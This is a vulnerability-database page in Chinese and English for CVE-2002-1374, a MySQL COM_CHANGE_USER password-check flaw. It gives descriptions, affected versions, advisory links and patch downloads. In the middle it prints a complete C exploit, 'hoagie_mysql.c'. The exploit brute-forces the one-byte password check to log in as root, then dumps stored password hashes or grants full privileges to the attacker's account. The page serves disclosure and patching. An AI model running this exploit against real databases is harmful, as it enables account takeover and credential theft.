CVE-2002-1374
CVSS7.5
发布时间 :2002-12-23 00:00:00
修订时间 :2016-10-17 22:26:29
NMCOES    

[原文]The COM_CHANGE_USER command in MySQL 3.x before 3.23.54, and 4.x before 4.0.6, allows remote attackers to gain privileges via a brute force attack using a one-character password, which causes MySQL to only compare the provided password against the first character of the real password.


[CNNVD]MySQL COM_CHANGE_USER功能口令认证缺陷漏洞(CNNVD-200212-053)

        
        MySQL是一款开放源代码关系型数据库系统。
        MySQL的密码验证机制存在缺陷,本地或远程攻击者可能利用这个漏洞以其他数据库帐号访问数据库,因为可以劫持数据库root用户帐号,所以攻击者可能完全控制数据库,结合系统的其他配置问题(比如有可写的CGI目录,或MySQL本身以root用户启动),可能对操作系统本身造成进一步危害。
        此漏洞本身并不是新发现的,而是对老漏洞的修补不彻底所致。在2000年02月,Robert van der Meulen发现MySQL系统中的密码验证系统存在一个缺陷(BUGTRAQ_ID:975 ),MySQL挑战应答算法在检查HASH后的口令时根据客户端提供的应答长度来定,因此如果客户端发送只有一个字符的应答,MySQL会只检查一个字节,因为MySQL实现的HASH算法每个HASH后的字符只有32种可能,这意味着最多只要尝试32次就可以给予服务端正确的应答。修正这个错误的时候,MySQL项目组只简单在服务端接受数据库登录连接的代码中加入了检查HASH后的口令长度必须为8个字节,但是却没有对COM_CHANGE_USER命令的处理过程中加入这个检查。因此攻击者使用合法的MySQL帐户仍旧可以尝试多次未授权访问数据库。本地用户意味着可以利用mysql root帐户控制所有数据库。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:mysql:mysql:3.23.48MySQL MySQL 3.23.48
cpe:/a:mysql:mysql:3.23.49MySQL MySQL 3.23.49
cpe:/a:mysql:mysql:3.23.46MySQL MySQL 3.23.46
cpe:/a:mysql:mysql:3.23.47MySQL MySQL 3.23.47
cpe:/a:symantec_veritas:netbackup_advanced_reporter:4.5_mp3
cpe:/a:mysql:mysql:3.23.30MySQL MySQL 3.23.30
cpe:/a:symantec_veritas:netbackup_advanced_reporter:4.5_mp2
cpe:/a:mysql:mysql:3.23.44MySQL MySQL 3.23.44
cpe:/a:symantec_veritas:netbackup_advanced_reporter:4.5_mp1
cpe:/a:mysql:mysql:3.22.32MySQL MySQL 3.22.32
cpe:/a:mysql:mysql:3.23.45MySQL MySQL 3.23.45
cpe:/a:mysql:mysql:3.23.42MySQL MySQL 3.23.42
cpe:/a:mysql:mysql:3.22.30MySQL MySQL 3.22.30
cpe:/a:mysql:mysql:3.23.43MySQL MySQL 3.23.43
cpe:/a:symantec_veritas:netbackup_advanced_reporter:3.4
cpe:/a:mysql:mysql:4.0.1MySQL MySQL 4.0.1
cpe:/a:mysql:mysql:4.0.0MySQL MySQL 4.0.0
cpe:/a:mysql:mysql:3.23.9MySQL MySQL 3.23.9
cpe:/a:mysql:mysql:4.0.3MySQL MySQL 4.0.3
cpe:/a:mysql:mysql:3.23.8MySQL MySQL 3.23.8
cpe:/a:mysql:mysql:4.0.2MySQL MySQL 4.0.2
cpe:/a:mysql:mysql:3.23.40MySQL MySQL 3.23.40
cpe:/a:mysql:mysql:3.23.41MySQL MySQL 3.23.41
cpe:/a:symantec_veritas:netbackup_global_data_manager:4.5_mp3
cpe:/a:mysql:mysql:3.23.3MySQL MySQL 3.23.3
cpe:/a:mysql:mysql:3.23.2MySQL MySQL 3.23.2
cpe:/a:mysql:mysql:3.23.5MySQL MySQL 3.23.5
cpe:/a:mysql:mysql:3.23.53MySQL MySQL 3.23.53
cpe:/a:mysql:mysql:3.23.10MySQL MySQL 3.23.10
cpe:/a:mysql:mysql:3.23.4MySQL MySQL 3.23.4
cpe:/a:symantec_veritas:netbackup_global_data_manager:4.5
cpe:/a:symantec_veritas:netbackup_global_data_manager:4.5_mp1
cpe:/a:symantec_veritas:netbackup_global_data_manager:4.5_mp2
cpe:/a:mysql:mysql:3.23.26MySQL MySQL 3.23.26
cpe:/a:mysql:mysql:3.23.27MySQL MySQL 3.23.27
cpe:/a:mysql:mysql:3.23.24MySQL MySQL 3.23.24
cpe:/a:mysql:mysql:3.23.25MySQL MySQL 3.23.25
cpe:/a:mysql:mysql:3.23.28MySQL MySQL 3.23.28
cpe:/a:mysql:mysql:3.23.29MySQL MySQL 3.23.29
cpe:/a:mysql:mysql:3.23.51MySQL MySQL 3.23.51
cpe:/a:mysql:mysql:3.23.52MySQL MySQL 3.23.52
cpe:/a:mysql:mysql:3.23.50MySQL MySQL 3.23.50
cpe:/a:mysql:mysql:3.23.23MySQL MySQL 3.23.23
cpe:/a:symantec_veritas:netbackup_advanced_reporter:4.5_fp3
cpe:/a:symantec_veritas:netbackup_advanced_reporter:4.5_fp2
cpe:/a:symantec_veritas:netbackup_advanced_reporter:4.5
cpe:/a:mysql:mysql:4.0.5aMySQL MySQL 4.0.5a
cpe:/a:mysql:mysql:3.22.26MySQL MySQL 3.22.26
cpe:/a:mysql:mysql:3.23.37MySQL MySQL 3.23.37
cpe:/a:mysql:mysql:3.23.38MySQL MySQL 3.23.38
cpe:/a:mysql:mysql:3.23.36MySQL MySQL 3.23.36
cpe:/a:mysql:mysql:3.22.29MySQL MySQL 3.22.29
cpe:/a:mysql:mysql:3.22.28MySQL MySQL 3.22.28
cpe:/a:mysql:mysql:3.23.39MySQL MySQL 3.23.39
cpe:/a:mysql:mysql:3.22.27MySQL MySQL 3.22.27
cpe:/a:mysql:mysql:3.23.53aMySQL MySQL 3.23.53a
cpe:/a:mysql:mysql:3.23.34MySQL MySQL 3.23.34
cpe:/a:mysql:mysql:3.23.31MySQL MySQL 3.23.31
cpe:/a:symantec_veritas:netbackup_global_data_manager:4.5_fp2
cpe:/a:symantec_veritas:netbackup_advanced_reporter:4.5_fp1
cpe:/a:symantec_veritas:netbackup_global_data_manager:4.5_fp3
cpe:/a:symantec_veritas:netbackup_global_data_manager:4.5_fp1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1374
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1374
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-053
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000555
(UNKNOWN)  CONECTIVA  CLSA-2002:555
http://marc.info/?l=bugtraq&m=103971644013961&w=2
(UNKNOWN)  BUGTRAQ  20021212 Advisory 04/2002: Multiple MySQL vulnerabilities
http://marc.info/?l=bugtraq&m=104004857201968&w=2
(UNKNOWN)  GENTOO  GLSA-200212-2
http://marc.info/?l=bugtraq&m=104005886114500&w=2
(UNKNOWN)  BUGTRAQ  20021216 [OpenPKG-SA-2002.013] OpenPKG Security Advisory (mysql)
http://security.e-matters.de/advisories/042002.html
(UNKNOWN)  MISC  http://security.e-matters.de/advisories/042002.html
http://www.debian.org/security/2002/dsa-212
(UNKNOWN)  DEBIAN  DSA-212
http://www.linuxsecurity.com/advisories/engarde_advisory-2660.html
(VENDOR_ADVISORY)  ENGARDE  ESA-20021213-033
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2002:087
(UNKNOWN)  MANDRAKE  MDKSA-2002:087
http://www.novell.com/linux/security/advisories/2003_003_mysql.html
(UNKNOWN)  SUSE  SUSE-SA:2003:003
http://www.redhat.com/support/errata/RHSA-2002-288.html
(UNKNOWN)  REDHAT  RHSA-2002:288
http://www.redhat.com/support/errata/RHSA-2002-289.html
(UNKNOWN)  REDHAT  RHSA-2002:289
http://www.redhat.com/support/errata/RHSA-2003-166.html
(UNKNOWN)  REDHAT  RHSA-2003:166
http://www.securityfocus.com/advisories/5269
(UNKNOWN)  IMMUNIX  IMNX-2003-7+-008-01
http://www.securityfocus.com/bid/6373
(VENDOR_ADVISORY)  BID  6373
http://www.trustix.net/errata/misc/2002/TSL-2002-0086-mysql.asc.txt
(UNKNOWN)  TRUSTIX  2002-0086
http://xforce.iss.net/xforce/xfdb/10847
(VENDOR_ADVISORY)  XF  mysql-comchangeuser-password-bypass(10847)

- 漏洞信息

MySQL COM_CHANGE_USER功能口令认证缺陷漏洞
高危 设计错误
2002-12-23 00:00:00 2006-03-28 00:00:00
远程  
        
        MySQL是一款开放源代码关系型数据库系统。
        MySQL的密码验证机制存在缺陷,本地或远程攻击者可能利用这个漏洞以其他数据库帐号访问数据库,因为可以劫持数据库root用户帐号,所以攻击者可能完全控制数据库,结合系统的其他配置问题(比如有可写的CGI目录,或MySQL本身以root用户启动),可能对操作系统本身造成进一步危害。
        此漏洞本身并不是新发现的,而是对老漏洞的修补不彻底所致。在2000年02月,Robert van der Meulen发现MySQL系统中的密码验证系统存在一个缺陷(BUGTRAQ_ID:975 ),MySQL挑战应答算法在检查HASH后的口令时根据客户端提供的应答长度来定,因此如果客户端发送只有一个字符的应答,MySQL会只检查一个字节,因为MySQL实现的HASH算法每个HASH后的字符只有32种可能,这意味着最多只要尝试32次就可以给予服务端正确的应答。修正这个错误的时候,MySQL项目组只简单在服务端接受数据库登录连接的代码中加入了检查HASH后的口令长度必须为8个字节,但是却没有对COM_CHANGE_USER命令的处理过程中加入这个检查。因此攻击者使用合法的MySQL帐户仍旧可以尝试多次未授权访问数据库。本地用户意味着可以利用mysql root帐户控制所有数据库。
        

- 公告与补丁

        厂商补丁:
        Conectiva
        ---------
        Conectiva已经为此发布了一个安全公告(CLA-2002:555)以及相应补丁:
        CLA-2002:555:MySQL
        链接:
        http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000555

        补丁下载:
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-3.23.36-14U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-bench-3.23.36-14U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-client-3.23.36-14U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-devel-3.23.36-14U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-devel-static-3.23.36-14U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-doc-3.23.36-14U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/MySQL-3.23.36-14U60_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-3.23.36-14U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-bench-3.23.36-14U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-client-3.23.36-14U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-devel-3.23.36-14U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-devel-static-3.23.36-14U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-doc-3.23.36-14U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/MySQL-3.23.36-14U70_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-3.23.46-4U80_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-bench-3.23.46-4U80_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-client-3.23.46-4U80_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-devel-3.23.46-4U80_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-devel-static-3.23.46-4U80_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-doc-3.23.46-4U80_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/SRPMS/MySQL-3.23.46-4U80_2cl.src.rpm
        Debian
        ------
        Debian已经为此发布了一个安全公告(DSA-212-1)以及相应补丁:
        DSA-212-1:Multiple MySQL vulnerabilities
        链接:
        http://www.debian.org/security/2002/dsa-212

        补丁下载:
        Source archives:
        
        http://security.debian.org/pool/updates/main/m/mysql/mysql_3.22.32-6.3.dsc

        Size/MD5 checksum: 1305 26482e7b5f51fe036c9270043877483a
        
        http://security.debian.org/pool/updates/main/m/mysql/mysql_3.22.32.orig.tar.gz

        Size/MD5 checksum: 4296259 e3d9cb3038a2e4378c9c0f4f9d8c2d58
        
        http://security.debian.org/pool/updates/main/m/mysql/mysql_3.22.32-6.3.diff.gz

        Size/MD5 checksum: 84166 79faf5c0f1e6ab6c4c3b7511f9cc1e71
        Architecture independent packages:
        
        http://security.debian.org/pool/updates/main/m/mysql/mysql-doc_3.22.32-6.3_all.deb

        Size/MD5 checksum: 1687018 e3d348a98e08bbff4085215356c5dcc7
        alpha architecture (DEC Alpha)
        
        http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.22.32-6.3_alpha.deb

        Size/MD5 checksum: 790098 2d103be33a041fa8af05a6d1a8fae1fc
        
        http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.22.32-6.3_alpha.deb

        Size/MD5 checksum: 99516 c3803f9e8e090bc9755cc8502f7dd860
        arm architecture (ARM)
        
        http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.22.32-6.3_arm.deb

        Size/MD5 checksum: 603710 028266a7c4c99365a8fe715fda7635b9
        
        http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.22.32-6.3_arm.deb

        Size/MD5 checksum: 87190 0f6e1c53dd71bd45ec0bfc7bdd3e92c3
        i386 architecture (Intel ia32)
        
        http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.22.32-6.3_i386.deb

        Size/MD5 checksum: 585150 54c0e5b9aa43a2d4fd2137f22851243a
        
        http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.22.32-6.3_i386.deb

        Size/MD5 checksum: 86768 fe2974d4fc341c7fc5c3866636a49676
        m68k architecture (Motorola Mc680x0)
        
        http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.22.32-6.3_m68k.deb

        Size/MD5 checksum: 554888 5d636134e003bdd33f6dd74e60ca6570
        
        http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.22.32-6.3_m68k.deb

        Size/MD5 checksum: 84534 47f6aa149c3b872722b5357bb962c0a7
        powerpc architecture (PowerPC)
        

- 漏洞信息 (22084)

MySQL 3.23.x/4.0.x COM_CHANGE_USER Password Length Account Compromise Vulnerability (EDBID:22084)
unix remote
2002-12-16 Verified
0 andi
N/A [点击下载]
source: http://www.securityfocus.com/bid/6373/info

A flaw in the password authentication mechanism for MySQL may make it possible for an authenticated database user to compromise the accounts of other database users. 

The flaw lies in the fact that the server uses a string returned by the client when the COM_CHANGE_USER command is issued to iterate through a comparison when attempting to authenticate the password. An attacker may authenticate as another database user if they can successfully guess the first character of the correct password for that user. The range of the valid character set for passwords is 32 characters, which means that a malicious user can authenticate after a maximum of 32 attempts if they cycle through all of the valid characters.

/***********************************************************
 * hoagie_mysql.c
 *
 * local and remote exploit for mysql <= 3.23.53a 
 *
 * new years present .... works also for 3.23.54 openbsd
 *			  (head) date 16/12/2002
 *
 * hey after some code checking and patching my mysql server
 * i relized, that this patch doesnt protect you against 
 * this vulnerability.
 * The length of the scramble string is important for the
 * password check and not the length of the password.
 *
 * perhaps other system are also still vulnerable
 *
 * gcc hoagie_mysql.c -o hoagie_mysql -lmysqlclient -I/usr/local/include -L/usr/local/lib/mysql
 *
 * Author: Andi <andi@void.at>
 *
 * Greetz to Greuff, philipp and the other hoagie-fellas :-)
 *
 * With this exploit you can also do that nasty things:
 *   http://void.at/andi/mysql.pdf
 *
 * $ ./hoagie_mysql -u dbuser -p dbpass
 * connecting to [localhost] as [dbpass] ... ok
 * sending one byte requests with user [root] ...
 *           root 13fb921913f4b3b1 
 *           root                  
 *           ...........
 *           ........
 * $
 *
 * If root or the attack user has no passwort set, this
 * exploit will fail -> thx to philipp
 *
 * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
 * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY 
 * DAMAGE DONE USING THIS PROGRAM.
 *
 ************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <mysql/mysql.h>

int do_attack(MYSQL *mysql, char *attackuser);
void do_action(MYSQL *mysql, char *action, char *user);
char *strmov(register char *dst, register const char *src);

int main(int argc, char **argv) {
   MYSQL mysql;
   char optchar;
   char *target, *user, *password, *attackuser, *action;

   target = user = password = action = attackuser= NULL;

   while ( (optchar = getopt(argc, argv, "ht:u:p:a:e:")) != EOF ) {
       switch(optchar) { 
           case 'h': printf("hoagie_mysql.c\n");
                     printf("-t ... mysql server (default localhost)\n");
      		     printf("-u ... username (default empty)\n");
                     printf("-p ... password (default empty)\n");
                     printf("-a ... attack user (default root)\n");
                     printf("-e ... action\n");
                     printf("-h ... this screen\n");
                     exit(0);
           case 't': target = optarg;
                     break;
           case 'u': user = optarg;
                     break;
           case 'p': password = optarg;
                     break;
           case 'a': attackuser = optarg;
                     break;
           case 'e': action = optarg;
       }
   }

   if (!target) target = "localhost";
   if (!user) user = "";
   if (!password) password = "";
   if (!attackuser) attackuser = "root";
   if (!action) action = "dumpuser";

   printf("connecting to [%s] as [%s] ... ", target, user);
   fflush(stdin);

   if (!mysql_connect(&mysql, target, user, password)) {
       printf("failed\n");
       return 0;
   } else {
       printf("ok\n");
   }

   printf("sending one byte requests with user [%s] ... \n", attackuser);
   if (!do_attack(&mysql, attackuser)) {
       do_action(&mysql, action, user);
   } else {
       printf("attack failed\n");
   }
   mysql_close(&mysql);

   return 0;
}

int do_attack(MYSQL *mysql, char *attackuser) {
   char buff[512], *pos=buff, *attackpasswd = "A";
   int i, len, j, ret = 1;

   pos = (char*)strmov(pos,attackuser)+1;
   mysql->scramble_buff[1] = 0;
   pos = scramble(pos, mysql->scramble_buff, attackpasswd,
               (my_bool) (mysql->protocol_version == 9));
   pos = (char*)strmov(pos+1,"");
   len = pos-buff;

   for (j = 0; ret && j < 32; j++) {
       buff[5] = 65 + j; 
       ret = simple_command(mysql,COM_CHANGE_USER, buff,(uint)len,0);
   }

   return ret;
}

void do_action(MYSQL *mysql, char *action, char *user) {
   MYSQL_ROW row;
   MYSQL_RES *result;
   char buf[512];

   mysql_select_db(mysql, "mysql");

   if (!strcmp(action, "dumpuser")) {
      mysql_query(mysql, "select user, password, host from user");
      result = mysql_use_result(mysql);

      while ((row = mysql_fetch_row(result)))
          printf("%16s %16s %50s\n", row[0], row[1], row[2]);
      mysql_free_result(result);
   } else if (!strcmp(action, "becomeadmin")) {
      snprintf(buf, sizeof(buf) - 1,
               "update user set Select_priv='Y', Insert_priv='Y', Update_priv='Y', Delete_priv='Y', "
               " Create_priv='Y', Drop_priv='Y', Reload_priv='Y', Shutdown_priv='Y', Process_priv='Y', "
               " File_priv='Y', Grant_priv='Y', References_priv='Y', Index_priv='Y', Alter_priv='Y' where "
               " user = '%s'", user);       
      mysql_query(mysql, buf);
      mysql_reload(mysql);
   } /* do whatever you want ... see mysql api ... // else if ( */
}

char *strmov(register char *dst, register const char *src)
{
	  while ((*dst++ = *src++)) ;
	    return dst-1;
}		

- 漏洞信息

8887
MySQL COM_CHANGE_USER Command One Character Password Brute Force
Remote / Network Access Authentication Management
Loss of Confidentiality
Exploit Unknown

- 漏洞描述

MySQL 4.0.5a contains a flaw in the COM_CHANGE_USER function that may lead to an unauthorized password exposure. It is possible to gain access to another user's credentials, such as root, by brute-force guessing only the first character of the target's password.

- 时间线

2002-12-12 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, MySQL AB has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

MySQL COM_CHANGE_USER Password Length Account Compromise Vulnerability
Design Error 6373
Yes No
2002-12-12 12:00:00 2009-07-11 07:16:00
Discovery of this issue is credited to Stefan Esser <s.esser@e-matters.de>.

- 受影响的程序版本

Veritas Software NetBackup Global Data Manager 4.5 MP3
Veritas Software NetBackup Global Data Manager 4.5 MP2
Veritas Software NetBackup Global Data Manager 4.5 MP1
Veritas Software NetBackup Global Data Manager 4.5 FP3
Veritas Software NetBackup Global Data Manager 4.5 FP2
Veritas Software NetBackup Global Data Manager 4.5 FP1
Veritas Software NetBackup Global Data Manager 4.5
Veritas Software NetBackup Advanced Reporter 4.5 MP3
Veritas Software NetBackup Advanced Reporter 4.5 MP2
Veritas Software NetBackup Advanced Reporter 4.5 MP1
Veritas Software NetBackup Advanced Reporter 4.5 FP3
Veritas Software NetBackup Advanced Reporter 4.5 FP2
Veritas Software NetBackup Advanced Reporter 4.5 FP1
Veritas Software NetBackup Advanced Reporter 4.5
Veritas Software NetBackup Advanced Reporter 3.4
MySQL AB MySQL 4.0.5 a
MySQL AB MySQL 4.0.3
MySQL AB MySQL 4.0.2
MySQL AB MySQL 4.0.1
MySQL AB MySQL 4.0 .0
MySQL AB MySQL 3.23.53 a
MySQL AB MySQL 3.23.53
+ OpenPKG OpenPKG Current
+ Sun Cobalt Qube 3
MySQL AB MySQL 3.23.52
+ Conectiva Linux Enterprise Edition 1.0
+ Mandriva Linux Mandrake 9.0
+ OpenPKG OpenPKG 1.1
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ S.u.S.E. Linux 8.1
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.51
MySQL AB MySQL 3.23.50
MySQL AB MySQL 3.23.49
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ RedHat Linux 7.3 i686
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
MySQL AB MySQL 3.23.48
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
MySQL AB MySQL 3.23.47
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
MySQL AB MySQL 3.23.46
+ Conectiva Linux 8.0
+ OpenPKG OpenPKG 1.0
MySQL AB MySQL 3.23.45
MySQL AB MySQL 3.23.44
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
MySQL AB MySQL 3.23.43
MySQL AB MySQL 3.23.42
MySQL AB MySQL 3.23.41
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.2
MySQL AB MySQL 3.23.40
MySQL AB MySQL 3.23.39
+ HP SCM 3.0
MySQL AB MySQL 3.23.38
MySQL AB MySQL 3.23.37
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
MySQL AB MySQL 3.23.36
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ EnGarde Secure Linux 1.0.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1
MySQL AB MySQL 3.23.34
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 3.5.1
- HP HP-UX 11.11
- HP HP-UX 11.0
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6
MySQL AB MySQL 3.23.33
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
MySQL AB MySQL 3.23.32
+ Wirex Immunix OS 7+
MySQL AB MySQL 3.23.31
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
MySQL AB MySQL 3.23.30
MySQL AB MySQL 3.23.29
MySQL AB MySQL 3.23.28
MySQL AB MySQL 3.23.27
MySQL AB MySQL 3.23.26
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
MySQL AB MySQL 3.23.25
MySQL AB MySQL 3.23.24
MySQL AB MySQL 3.23.23
MySQL AB MySQL 3.23.22
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
MySQL AB MySQL 3.23.10
MySQL AB MySQL 3.23.9
MySQL AB MySQL 3.23.8
MySQL AB MySQL 3.23.5
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.4
MySQL AB MySQL 3.23.3
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
MySQL AB MySQL 3.22.32
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
MySQL AB MySQL 3.22.30
MySQL AB MySQL 3.22.29
MySQL AB MySQL 3.22.28
MySQL AB MySQL 3.22.27
MySQL AB MySQL 3.22.26
Miva htmlscript 3.23.32
Veritas Software NetBackup Global Data Manager 4.5 MP4
Veritas Software NetBackup Global Data Manager 4.5 FP4
Veritas Software NetBackup Advanced Reporter 4.5 MP4
Veritas Software NetBackup Advanced Reporter 4.5 FP4
MySQL AB MySQL 3.23.54
+ Sun Cobalt RaQ 550
+ Trustix Secure Linux 1.5

- 不受影响的程序版本

Veritas Software NetBackup Global Data Manager 4.5 MP4
Veritas Software NetBackup Global Data Manager 4.5 FP4
Veritas Software NetBackup Advanced Reporter 4.5 MP4
Veritas Software NetBackup Advanced Reporter 4.5 FP4
MySQL AB MySQL 3.23.54
+ Sun Cobalt RaQ 550
+ Trustix Secure Linux 1.5

- 漏洞讨论

A flaw in the password authentication mechanism for MySQL may make it possible for an authenticated database user to compromise the accounts of other database users.

The flaw lies in the fact that the server uses a string returned by the client when the COM_CHANGE_USER command is issued to iterate through a comparison when attempting to authenticate the password. An attacker may authenticate as another database user if they can successfully guess the first character of the correct password for that user. The range of the valid character set for passwords is 32 characters, which means that a malicious user can authenticate after a maximum of 32 attempts if they cycle through all of the valid characters.

This issue is related to the vulnerability described in Bugtraq ID 975. The problem was not sufficiently addressed in the COM_CHANGE_USER command.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Exploit is available:

- 解决方案

EnGarde has released updated fixes. The original fixes did not address the COM_TABLE_DUMP vulnerability (BID 6368). The upgraded packages now include fixes for this vulnerability.

Gentoo Linux has released an advisory. Users who have installed dev-db/mysql-3.23.53 and earlier are urged to update their systems by issuing the following commands:

emerge rsync
emerge mysql
emerge clean

OpenPKG has released an advisory (OpenPKG-SA-2002.013) which addresses this issue. Please see the attached advisory for details on fixing this issue on systems using OpenPKG.

Conectiva Linux and Debian have released advisories. Information about obtaining and applying fixes can be found in the referenced advisories.

SuSE has released an advisory (SuSE-SA:2003:003) which addresses this issue. Please see the attached advisory for details on obtaining and applying fixes.

Veritas has released an advisory and updated feature and maintenance packs to address this issue.

This issue has been addressed in MySQL 3.23.54.


MySQL AB MySQL 3.22.32

MySQL AB MySQL 3.23.10

MySQL AB MySQL 3.23.22

MySQL AB MySQL 3.23.23

MySQL AB MySQL 3.23.24

MySQL AB MySQL 3.23.25

MySQL AB MySQL 3.23.26

MySQL AB MySQL 3.23.27

MySQL AB MySQL 3.23.28

MySQL AB MySQL 3.23.29

MySQL AB MySQL 3.23.3

MySQL AB MySQL 3.23.30

MySQL AB MySQL 3.23.31

MySQL AB MySQL 3.23.32

MySQL AB MySQL 3.23.33

MySQL AB MySQL 3.23.34

MySQL AB MySQL 3.23.36

MySQL AB MySQL 3.23.37

MySQL AB MySQL 3.23.38

MySQL AB MySQL 3.23.39

MySQL AB MySQL 3.23.4

MySQL AB MySQL 3.23.40

MySQL AB MySQL 3.23.41

MySQL AB MySQL 3.23.42

MySQL AB MySQL 3.23.43

MySQL AB MySQL 3.23.44

MySQL AB MySQL 3.23.45

MySQL AB MySQL 3.23.46

MySQL AB MySQL 3.23.47

MySQL AB MySQL 3.23.48

MySQL AB MySQL 3.23.49

